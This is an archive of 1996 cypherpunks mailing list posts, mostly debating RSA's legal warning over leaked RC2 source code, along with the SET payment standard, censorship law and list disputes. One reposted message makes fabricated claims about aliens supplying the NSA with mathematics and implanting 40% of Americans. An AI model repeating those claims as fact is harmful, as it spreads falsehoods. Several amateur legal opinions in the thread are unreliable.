At 7:06 PM 02/01/96, baldwin wrote:
>WARNING NOTICE
>
>        It has recently come to the attention of RSA Data
>Security, Inc. that certain of its confidential and
>proprietary source code has been misappropriated and
>disclosed.  Despite such unauthorized use and disclosure,
>RSA Data Security reserves all intellectual property rights
>in such source code under applicable law, including without
>limitation trade secret and copyright protection.  In

Well, now we know it really was RC2.

Is there a law-knowing type out there who can tell us what's going on
legally?  As I understand things, RSA is just bullshitting here.  When
something has 'trade secret' status, the only people with legal obligations
toward it are those with contractual obligations to RSA--you can only
enforce 'trade secrets' through contractual obligations, non-disclosure and
confidentiality agreements, etc.  Once something has been disclosed, as I
understand it,  people without contractual obligations in regards to it are
free to do whatever they want to it--trade secret status of RC2 has nothing
to do with me, who has no contractual obligations to RSA regarding RC2.
(Unless the license agreement for RSAref could be stretched to apply
somehow, but I don't think so).

Now, copyright might be another matter.    But you can't copyright an
algorithm, only specific text in fixed form (ie, the source code).  So this
would mean you couldn't use the particular code posted to sci.crypt, but
wouldn't stop anyone from using the algorithm, if they wrote their own code
(to be safe, without having seen the RSA-copyrighted code, only having the
algorithm described to them by someone else).   You can _patent_ an
algorithm, but as I understand it, something can't be patented and a trade
secret--you have to disclose it in full to the patent office to get a
patent, at which point it's no longer a trade secret.  And the legalese
from RSA doesn't even mention patents anyway (because they dont' have one,
of course), only copyright and 'trade secret'.

I'm not a lawyer of course.  Information from someone more sure of their
knowledge then I am would be appreciated.  But, as I understand it, they're
basically making stuff up, and there is nothing stopping any of us, who
haven't signed any non-disclosure agreements with RSA, from using the RC2
algorithm.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 2 Feb 1996 11:26:57 +0800
To: Clay Olbon II <olbon@dynetics.com>
Subject: Re: Visa & MC Std
In-Reply-To: <v01540b09ad367ceb54a3@[193.239.225.200]>
Message-ID: <31117ABA.611B@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Clay Olbon II wrote:
> 
> At 8:25 AM 2/1/96, pj ponder wrote (much elided):
> 
> >AN FRANCISCO -- Hoping to remove a major impediment to credit card
> >transactions over the Internet, a business group led by Mastercard
> >International
> >and Visa International plans to announce an industry-standard technology
> >Thursday for protecting the security of electronic payments.
> ...
> >
> >The software standard, called Secure Electronic Transactions, or SET,
> >will permit a user to send a credit card account numbers to a merchant
> >in a scrambled
> >form.
> >
> >The scrambled number is supposed to be unintelligible to electronic
> >eavesdroppers and thieves -- and even to the merchants receiving the
> >payment.
> >
> >But a special code is supposed to enable the merchant to check
> >electronically and automatically with the bank that issued the credit
> >card to make sure that it is a
> >valid card number and that the customer is the authorized user of the
> >card. The number-scrambling part of the system is based on a well-known
> >and widely used
> >national software standard known as the Data Encryption Standard.
> 
> ----------------

  First a disclaimer.  I have not studied the drafts of the protocol,
or been directly involved with its development.  I do know a few things
and I will try to answer to the best of my abilities.

> A few psueudorandom points regarding this post:
> 
>         First, it seems silly to implement a separate standard that only
> works for the credit card number.  What about the privacy of the rest of
> the info (what I am ordering, how much, etc.).
> 
>         Can (or will) this be layered with Netscape's SSL?

  I don't know if the spec will specify SSL as the required transport, but
I think that our products will use it.

>         How is this to be implemented?  It sounds like the merchants will
> just pass the encrypted number to the credit card company.  If this is the
> case, key management could become an issue.  I suppose this could easily be
> implemented using public key crypto, but only DES was mentioned.  If only
> DES is used and everyone uses the same DES key, that would be a valuable
> key to break!

  RSA will be used in addition to DES (or perhaps something stronger).

>         How about a MITM attack.  Get the encrypted credit card #, and
> change the purchase amount, delivery info, etc if that is not encrypted.

  There is stuff in the protocol to prevent MITM and replay attacks.
I'm not familiar with the details, but I know that they have been
thinking about these problems for a long time.

> If there is anyone on the list with more info on this, I would love to hear
> it (heopfully we will hear something from Netscape, since they are quoted
> in the article).  From what I know so far, it seems like a poor compromise.

  It is hard to get even the flavor of the protocol in a press release that
has been dumbed down for the general population.  I believe that the spec
will be released for a public review period before it is finalized, so you
should have a chance to review it and get your comments in.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 3 Feb 1996 04:45:39 +0800
To: baldwin@RSA.COM (RobertW.Baldwin) (baldwin)
Subject: Re: RC2 Source Code - Legal Warning from RSADSI
In-Reply-To: <9601018232.AA823213189@snail.rsa.com>
Message-ID: <199602012351.SAA16150@homeport.org>
MIME-Version: 1.0
Content-Type: text


baldwin wrote:

|         RSA Data Security considers misappropriation of its
| intellectual property to be most serious.  Not only is this
| act a violation of law, but its publication is yet another
| abuse of the Internet.  RSA has begun an investigation and
| will proceed with appropriate action against anyone found to
| have violated its intellectual property rights.

	Out of curiosity, did your similar investigation of RC4 ever
lead anywhere?

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 2 Feb 1996 11:31:55 +0800
To: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Subject: Re: Prediction about new credit card number scheme
In-Reply-To: <Pine.SUN.3.91.960201181356.2008H-100000@hertz.isr.umd.edu>
Message-ID: <Pine.SOL.3.91.960201185557.11657A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 1 Feb 1996, Thomas Grant Edwards wrote:

> 
> >By JOHN MARKOFF AN FRANCISCO -- 
> >Hoping to remove a major impediment to credit card transactions over the
> >Internet, a business group led by Mastercard International and Visa
> >International plans to announce an industry-standard technology Thursday
> >for protecting the security of electronic payments. 
> 
> My prediction about the new CC standard:  it will be a mistake if they 
> don't pass on the details to cypherpunks.
> 
> BTW - are any micropayment schemes reving up to commerciality yet???
> 
> -Thomas
> 
> 
> 
> 
> 

(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 
	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 2 Feb 1996 11:35:56 +0800
To: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Subject: Re: Prediction about new credit card number scheme
In-Reply-To: <Pine.SUN.3.91.960201181356.2008H-100000@hertz.isr.umd.edu>
Message-ID: <31117E58.6F16@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Thomas Grant Edwards wrote:
> 
> >By JOHN MARKOFF AN FRANCISCO --
> >Hoping to remove a major impediment to credit card transactions over the
> >Internet, a business group led by Mastercard International and Visa
> >International plans to announce an industry-standard technology Thursday
> >for protecting the security of electronic payments.
> 
> My prediction about the new CC standard:  it will be a mistake if they
> don't pass on the details to cypherpunks.

  I believe that there will be a public review period.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 2 Feb 1996 09:09:47 +0800
To: cypherpunks@toad.com
Subject: Re:  RC2 Source Code - Legal Warning from RSADSI
Message-ID: <9602020046.AA23769@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Once lost, trade secret can never be regained.  The person(s) responsible
can be sued so they never work again :), but it's unclear if RSA can
stop anyone using unpublished trade-secret source.

At any rate, I'll stop my comparison of the distributed RC2 and the 
licensed RC2 since RSA's done it for us. :)
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 3 Feb 1996 19:57:21 +0800
To: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Subject: Re: RC2 Source Code - Legal Warning from RSADSI
In-Reply-To: <96Feb1.215126edt.10310@cannon.ecf.toronto.edu>
Message-ID: <Pine.SOL.3.91.960201195824.11657E-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 1 Feb 1996, SINCLAIR  DOUGLAS N wrote:

> The author claims that the code was disassembled.  S/he credits "CodeView"
> which is Microsoft's debugging/disassembly tool.  Of course, this could
> just be a cunning ruse...

i'd guess it was in fact reverse engineered




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@utopia.hacktic.nl>
Date: Fri, 2 Feb 1996 03:38:46 +0800
To: cypherpunks@toad.com
Subject: Re: Unscribe
Message-ID: <199602011859.TAA15481@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


TCM sez:
: At 1:34 AM 2/2/96, Ewout Meij wrote:
: >unscribe cypherpunks@toad.com
:  ^^^^^^^^
: >
: >unscribe emeij@pi.net
:  ^^^^^^^^
: >
: >There is a theory which states that if ever anyone discovers exactly
: >what the Universe is for and why it is here, it will instantly
: >disappear and be replaced by something even more bizarre and
: >inexplicable.


: There is a theory which states that the correct way to unsubscribe from
: mailing lists is defined by the mailing list charter and principles, and
: that sending misspelled "unscribe" messages to the wrong place, and
: including "unscribe" messages intended for other lists, is bizarre and
: inexplicable.

: --TCM


[pi.net] 'Planet Internet' is the dutch equivalent of AOL.

-AJ-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mr. Boffo" <mixmaster@vishnu.alias.net>
Date: Fri, 2 Feb 1996 10:39:17 +0800
To: cypherpunks@toad.com
Subject: Re: RC2 Source Code - Legal Warning from RSADSI
Message-ID: <199602020200.UAA22646@vishnu.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


> WARNING NOTICE > > It has recently come to the attention of RSA Data 
> Security, Inc. that certain of its confidential and
> proprietary source code has been misappropriated and 
> disclosed.  Despite such unauthorized use and disclosure, 
> RSA Data Security reserves all intellectual property rights 
> in such source code under applicable law, including without
> limitation trade secret and copyright protection.  In

	Ya know... This is getting old! It seems like RSA Data
Security can't control their own site. It only seems like yesterday
(actually about 2 years ago) that another one of their "RC" algorithms
was published to the Usenet thru anonymous remailers. Can't they
secure their own site against break-ins? If they want to be the
prima-donna site for encryption with all of the "copy-written" crypto,
you would think that they could protect their own resources better.

Lazarus Long




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Fri, 2 Feb 1996 10:30:40 +0800
To: jrochkin@cs.oberlin.edu
Subject: Re: RC2 Source Code - Legal Warning from RSADSI
In-Reply-To: <ad36b3ea020210044647@[132.162.233.188]>
Message-ID: <9602020205.AA14789@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Thu, 1 Feb 1996 18:26:15 -0500
   Mime-Version: 1.0
   Content-Type: text/plain; charset="us-ascii"
   From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   Now, copyright might be another matter.    But you can't copyright an
   algorithm, only specific text in fixed form (ie, the source code).  So this
   would mean you couldn't use the particular code posted to sci.crypt, but
   wouldn't stop anyone from using the algorithm, if they wrote their own code
   (to be safe, without having seen the RSA-copyrighted code, only having the
   algorithm described to them by someone else).   

If the source code posted to sci.crypt was in fact a copy of an RSADSI
copyrighted soure code listing, then making copies of that listing is a
copyright violation.  However, copyright protection does not extend to
the underlying algorithm, so unless RSADSI has a patent on the algorithm
the idea is free, and can be reimplemented using a "clean room" or
"Chinese wall" approach.  If the posted source code was *not* a copy of
RSADSI source code but instead produced by disassembling object code
RSADSI's claims are tenuous at best.  RSADSI could conceivably claim
that the disassembled code is a derivative product of their copyrighted
object code, but I think they would have a hard time distinguishing
themselves from the facts in _Sega v. Accolade_.

I fail to see how the legality of "alleged-RC2" is any different than
that of the "alleged-RC4" code which was published last year.

						--bal






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 2 Feb 1996 11:22:02 +0800
To: rich@c2.org
Subject: Re: [NOISY] Deutsche Telekom <--> webcom.com "routing troubles"
Message-ID: <01I0PPI0LL00A0UNHV@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	While it fortunately seems that the German government is getting some
sense, I've had one idea for future such anti-censorship efforts. It's that,
despite Alta Vista and other spiders, sometimes things on the web don't get
spotted by search engines very soon. Having information out there doesn't do
much good if people who haven't been following newsgroups, etcetera don't know
about it.
	Rich and Declan may have thought of this already, but I haven't seen it
on cypherpunks. There is a web page for multiple search-engine submissions at
http://www.submit-it.com/. I don't know how well it works, since I haven't used
it (yet). But it might be something to try.
	-Allen 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam philipp <adam@rosa.com>
Date: Fri, 2 Feb 1996 14:14:14 +0800
To: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Subject: Re: RC2 Source Code - Legal Warning from RSADSI
Message-ID: <05390275000371@compuvar.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:51 PM 2/1/96 -0500, you wrote:
>The author claims that the code was disassembled.  S/he credits "CodeView"
>which is Microsoft's debugging/disassembly tool.  Of course, this could
>just be a cunning ruse...
   Although it has not been completely settled that disassembly is a
legitimate form of reverse engineering, the trend has been to consider the
two equivalent. So, whoever posted RC2 had at least a good idea of how to
present it. 
   I don't think it would be be a good idea for them to come out and sue RSA
for libel for the accusation that it was misappropriated however.

   Adam, Esq.

--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
|PGP key available on my home page|Unauthorized interception violates |
|  http://XXXXXXXXXXXXXXXXX/adam  |federal law (18 USC Section 2700 et|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA...                      |communications are preferred for   | 
|  (see home page for definition) |sensitive materials.               |
\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Fri, 2 Feb 1996 11:22:01 +0800
To: adam@rosa.com (Adam philipp)
Subject: Re: RC2 Source Code - Legal Warning from RSADSI
In-Reply-To: <no.id>
Message-ID: <96Feb1.215126edt.10310@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


>    I hope that his code was not stolen, if it was actually stolen and then
> released and we knew that for sure, then trade secret rights would probably
> still apply. However the code was posted anonymously we do NOT know for
> certain that it was MISAPPROPRIATED. As such it may have been reverse
> engineered in manner that does not violate trade secrets and hence it can be
> used. The burden is with RSA to prove that any one person KNEW it was
> misappropriated. That is why we are seeing all these messages flying around
> on the web, RSA attorneys are trying to shut the barn door after the horses
> have left...

The author claims that the code was disassembled.  S/he credits "CodeView"
which is Microsoft's debugging/disassembly tool.  Of course, this could
just be a cunning ruse...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 2 Feb 1996 23:09:07 +0800
To: cypherpunks@toad.com
Subject: Germans, Nazis, Jews, and My Beliefs
Message-ID: <ad36cf860d0210045924@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



With all of the recent developments, including the comments against
censorship and in favor of measures to route around censorship, and the
charges of pro-Nazi sentiment, let me state some of my beliefs:

* I strongly believe, to the point of certainty, that the events described
variously as "the Holocaust" and "the gassing of Jews" occurred. I first
encountered photos in "Life" magazine, circa 1966, and nothing I have seen
since then has even slightly shaken my belief that Hitler and his
government oversaw the extermination in the most barbaric manner of several
millions of Jews, gypsies, homosexuals, cripples, etc.

* However, I am very fond of German culture in general. Though my ancestry
is essentially Scandinavian (Denmark, Norway) and Anglo-Saxon (Scotland,
England), I have felt more affinity for things Germanic than for things
French, Italian, Spanish, etc. Perhaps it was my interest in science, where
Einstein, Heisenberg, Schodinger, etc., reigned supreme (though Darwin and
Newton were no slouches!), but I felt an affinity for Germany that I did
not feel for, say, France (though I lived for a year in the south of
France, near Nice, as a child).

* By "German culture" I mean: Einstein, the Rhine, beer, Beethoven, Mozart,
castles, the Alps, Salzburg, Goethe, Heidelberg, and of course, the
language (which is a root language of English, naturlich, and part of the
"Indo-Germanisches," or "Indo-European" family of languages...proto-IE goes
back a lot further than either Greek or Latin, which are just variants of
PIE).

* Nothing about the Third Reich appeals to me, excpept that they had some
pretty good scientists. (And I believe that Schrodinger, Heisenberg, and
others dragged their feet on alerting Hitler and his advisors to the real
prospects for atomic bombs...in a way that Einstein, Bohr, Fermi, Szilard,
and dozens of others in the U.S. at that time did not.) As one opposed to
the excesses of government power, I view the excesses of the Third Reich as
an object lesson about the dangers of totalitarianism.

* I believe that much of "Jewish culture" is, for historical reasons,
closely related to German culture. It is understandable that so many Jews
hate Germans and German culture, but also sad. (I don't mean the newer
Israeli/Hebrew culture, but the Yiddish/German culture, which was so shaken
by the Holocaust that, sadly in my opinion, it cannot acknowledte its
essential Germanness.)

* As far as racial or ethnic differences go, I believe the so-called races
are essentially indistinguishable, except for superficial differences in
appearance, stature, pigmentation, etc. (And a comparison between Watusis
and pygmies will reveal that "Negroids" are as varied in stature--and
basketball skill--as any differences between Negroid, Caucasoid, and
Mongoloid.) That all the races and sub-races, from Australian Aboriginal to
European to Asian to American Indian can interbreed with identical
fertility rates suggests no genomic differences. In fact, it strongly
suggest that evolution as we normally think of it essentially stopped some
tens of thousands of years ago, which makes a lot of sense.

And there you have it. Let no one call me a Nazi.


--Tim May



Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 3 Feb 1996 00:00:05 +0800
To: Rich Graves <lmccarth@cs.umass.edu
Subject: Re: Tim's paranoid rant about Declan appearing on "Europe's Most Wanted"
Message-ID: <199602020704.XAA14197@shell1.best.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 1 Feb 1996, Declan B. McCullagh wrote:
> > Rich, by now I suspect you've seen this joke, but what the hell:
> > 
> >    Q: What's a left-wing firing squad?
> > 
> >    A: Everyone stands in a circle and shoots at each other

At 06:11 PM 2/1/96 -0800, Rich Graves wrote:
> I guess this is supposed to be something clever about how the vanguard is
> supposed to discard their personal interests for the common good. 

Actually it refers to the famous factionalism of the left:  Similar
to the parody in Monty Python's "Life of Brian"
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sat, 3 Feb 1996 19:52:30 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Declan appearing on "Europe's Most Wanted"
Message-ID: <v02140a00ad36cb878373@[165.254.158.237]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:26 2/1/96, Timothy C. May wrote:

>The Nebraska-based neo-Nazi publisher who was picked up in Denmark and
>extradited to Germany pretty much knew his actions were illegal in Germany,
>but I doubt (sheer speculation on my part) he had ever been formally
>notified that an arrest warrant had been issued by Germany and could be
>exercised in Denmark.

It is even worse since they invited him into the country (and issued him a
Visa with the intent of arresting him and shipping him to Germany) to
attend a Nazi Convention. It was, in essence, a Government Authorized Sting
Operation.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 2 Feb 1996 16:11:30 +0800
To: cypherpunks@toad.com
Subject: Alien factoring breakthroughs
Message-ID: <199602020747.XAA15564@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Came across this little gem on the web the other day.

I thought I'd post it - it's as sensible as most of the crap here.

Yours conspiratorially,
Noddy.

----------------------------------------------------------------------------

From: remallin@dorsai.dorsai.org (Richard Mallinson)
Newsgroups: alt.conspiracy, alt.alien.visitors, sci.math,
alt.politics.org.nsa
Subject: The Grays' involvement in cryptography and national security
Date: 25 Jan 1994 07:05:10 GMT
Summary: How the NSA has got help from extraterrtestrials

----------------------------------------------------------------------------

One thing that the NSA will not reveal is the magnitude of their advancement
in theoretical mathematics and cryptography. It is estimated that the NSA is
about 200 years ahead of the rest of the world in mathematical theory. This
not only allows them to break any code devised outside of the NSA, but to
devise codes which cannot be broken.

A tiny part of this advancement is due to an intensive mathematics research
program commenced in the 1960s. Fermat's Last Theorem was proven
conclusively in 1964, but only those in the NSA know of it. Some 2,000
theorems and lemmas, all numbered and classified, have arisen. At least a
dozen branches of theoretical mathematics such as flag theory, superspace
theory, interstice theory, match theory and quantum logic have been
developed, and yet not only has the outside world never heard of them, but
the NSA has been deliberately inserting disinformation into textbooks,
research papers, et cetera to keep everybody else off the trail.

Most of this advancement has been achieved with outside help. In 1973,
during the Nixon Administration, the NSA hooked up fith the Jason Society,
the top-secret body that liaises with the extraterrestrial beings known as
the Grays. This gave them an immediate infusion of mathematical theory, as
the grays have developed mathematics to a level which we cannot completely
comprehend. In return, the grays were given two more bases in New Mexico and
a 15% increase in the number of people that they may abduct per year for
analysis and extraction of vital fluids.

The Grays have renegged on their abduction quota agreement, and are
abducting many more people than before. Most of these are returned, after
being implanted with a device which allows the grays to have total control
over their thoughts and actions. Approximately 40% of Americans now carry
one of these devices, which are impossible to remove without killing the
host.

Richard E. Mallinson

----------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 2 Feb 1996 17:20:10 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Charter of PDX Cpunk meetings
Message-ID: <m0tiGg6-0008zpC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10:52 PM 2/1/96 -0800, Alan Olsen wrote:

>
>I requested that this debate be taken to private e-mail.  Since you seem to 
>not want to do that, and since you insist of making false and unrealistic 
>claims, 

Which "false and unrealistic claims"?


I am removing your name from the subscription list for 
>pdx-cypherpunks.

This isn't a DEBATE.  It is a WARNING to all other potential suckers in the 
Portland Oregon area that Alan Olsen engaged in highly unethical behavior 
with regards to the recent cypherpunks meeting, flamed me without 
justification in the national list, failed to respond to security inquiries, 
failed to deny issues and matters of truth, and failed to properly deal with 
a situation that he had a responsibility to handle ethically.  Not to 
mention lying in the comment above.

I am going to take this to the national list, because you took it there 
first in your original flame:  I am going to point out that you flamed me 
for no good reason; you engaged in a "knee-jerk" "debunking" without even 
knowing what you were ostensibly "debunking,"  that you failed to respond to 
my polite request for clarification; that you've attempted to pretend that I 
was somehow at fault for noticing your transgressions; that your local 
clique is pre-programmed to defend you in the face of your transgressions.  
I notice that some of them don't even know what a key-signing meeting is 
FOR:  I've received commentary which suggests that they believe that 
key-signing somehow vouches for the HONESTY of the person involved; not his 
IDENTITY.

Until you start responding substantively to legitimate complaints, that is 
all you deserve.  The public needs to be warned about people like you.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRHIE/qHVDBboB2dAQHHMAQAkTFZaMMF6asl79yU8RSkd5O0zYElg9so
syuonRR1UnrzTGlQ2cT/8GPZhuV/IIBSiroxu7EwCX6ASR6BTRUGVdTWbN3l27Vi
M6FRiduXpBvzpIzQ7XOzwcvPv0D/bLXwXPGHzmUzqsk3chWpsskKw1PKZun7wCKL
fG2MVim+Vqk=
=Di2Q
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 2 Feb 1996 17:08:34 +0800
To: "baldwin" <cypherpunks@toad.com
Subject: Re: RC2 Source Code - Legal Warning from RSADSI
Message-ID: <m0tiGjw-00091tC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Despite being totally uninvolved with whatever this guy's talking about, Jim
Bell is responding:


At 11:06 AM 2/1/96 PST, baldwin wrote:
>
>WARNING NOTICE
>
>        It has recently come to the attention of RSA Data
>Security, Inc. that certain of its confidential and
>proprietary source code has been misappropriated and
>disclosed.  Despite such unauthorized use and disclosure,
>RSA Data Security reserves all intellectual property rights
>in such source code under applicable law, including without
>limitation trade secret and copyright protection.

Hey, I'm not a lawyer, and I don't even play one on TV, but as I understood 
the law keeping something a secret was an alternative to disclosing it with 
a patent.  Patents had certain advantages and disadvantages; trade secrets 
had other advantages and other disadvantages.  A famous example, the 
"formula for Coca-Cola" was kept secret for decades; to patent it would have 
allowed anybody else to build Coca-Cola after 17 years of patent protection. 
 Keeping it secret could, theoretically last forever, but the legal 
protection against copying is less or even non-existent.

I am well aware that the legal system has been abusing the whole concept of 
patenting software, etc, ever since they discovered they wanted to keep the 
country from using RSA in the middle 1970's.

However, it seems to me that if your "trade secret" is now disclosed, then 
it really isn't a "trade secret" anymore and you lose "trade secret" status. 
 You may have a valid claim against the discloser, but that SHOULD be 
unrelated to everyone else.

It sounds like you want the best of both worlds:  You want to claim "trade 
secret" status for something that you either can't or don't want to patent.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Fri, 2 Feb 1996 14:24:37 +0800
To: fight-censorship@andrew.cmu.edu
Subject: Telecom Bill may makes abortion talke illegal on the net...
Message-ID: <Pine.SUN.3.91.960202004700.5224B-100000@pipa.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



Sec. 507 of the Telecom Bill Ammends Section 1462 of title 18 of the U.S. 
Code (Chapter 71), in ways which may make sending the following over the 
Internet illegal:

 o any text, graphic, or sound that is lewd, lascivious, or filthy

 o any information telling about how to obtain or make abortions and 
   drugs, or obtaining or making anything that is for indecent or immoral 
   use

Here is Section 1462 as Ammended:

(Telecom bill chnages in "<" and ">"):

Section 1462. Importation or transportation of obscene matters

Whoever brings into the United States, or any place subject to the
jurisdiction thereof, or knowingly uses any express company or other common
carrier <or interactive computer service (as defined in section 230(e)(2) of
the Communications Act of 1934)>, for carriage in interstate or foreign
commerce -
        
        (a) any obscene, lewd, lascivious, or filthy book, pamphlet, picture,
motion-picture film, paper, letter, writing, print, or other matter of
indecent character; or
        (b) any obscene, lewd, lascivious, or filthy phonograph recording,
electrical transcription, or other article or thing capable of producing
sound; or
        (c) any drug, medicine, article, or thing designed, adapted, or
intended for producing abortion, or for any indecent or immoral use; or any
written or printed card, letter, circular, book, pamphlet, advertisement, or
notice of any kind giving information, directly or indirectly, where, how, or
of whom, or by what means any of such mentioned articles, matters, or things
may be obtained or made; or Whoever knowingly takes <or receives>, from such
express company or other common carrier <or interactive computer service (as
defined in section 230(e)(2) of the Communications Act of 1934)> any matter
or thing the carriage <or importation> of which is herein made unlawful -

       Shall be fined not more than $5,000 or imprisoned not more than five
years, or both, for the first such offense and shall be fined not more than
$10,000 or imprisoned not more than ten years, or both, for each such offense
thereafter. 

-----------

Here is the text which addes the interactive computer service part 
in the Telecom Bill:

SEC. 507. CLARIFICATION OF CURRENT LAWS REGARDING COMMUNICATION
OF OBSCENE MATERIALS THROUGH THE USE OF COMPUTERS.
     (a) Importation or Transportation.--Section 1462 of title 18, United 
States Code, is amended--

          (1) in the first undesignated paragraph, by inserting ``or
interactive computer service (as defined in section 230(e)(2) of the
Communications Act of 1934)'' after ``carrier''; and

          (2)  in the second undesignated paragraph--
               (A) by inserting ``or receives,'' after ``takes''; 
               (B) by inserting ``or interactive computer service (as defined
in section 230(e)(2) of the Communications Act of 1934)'' after ``common
carrier''; and
	       (C) by inserting ``or importation'' after ``carriage''.

-----------

Media Notes:

USAToday 02/01/96 - 07:37 PM ET http://www.usatoday.com/news/washdc/ncs16.htm

Telecommunications deregulation breaks down electronic walls 

"At one point, the debate veered off on abortion. 

Seeing a ''high-tech gag rule,'' Rep. Nita Lowey, D-N.Y., joined by Pat 
Schroeder, D-Colo., and several other women lawmakers, asserted the
anti-pornography provisions would outlaw discussions about abortion over 
the Internet, the global computer network. 

Rep Henry Hyde, R-Ill., a leading abortion foe, assured members that 
nothing in the bill suggested any restrictions on discussions about 
abortion."

Well, Henry Hyde was right - nothing in the bill suggests restrictions on 
abortion discussion - the restrictions are in Title 18 of the U.S. Code, 
which now includes computer networks.

-----------

Thanks to the Cornell Law School Legal Information Institute
(http://www.law.cornell.edu/) and the Alliance for Competitive Communications
(http://www.bell.com/) for source text.

-Thomas Edwards
 












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Sat, 3 Feb 1996 17:50:12 +0800
To: eagle@armory.com
Subject: Re: Denning's misleading statements
Message-ID: <Pine.BSD.3.91.960202010152.21664A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
 
  Jeff, 
 
 
  On 01 28 96 you say: 
 
    We [cypherpunks] are becoming the "Bad Guys" in a well 
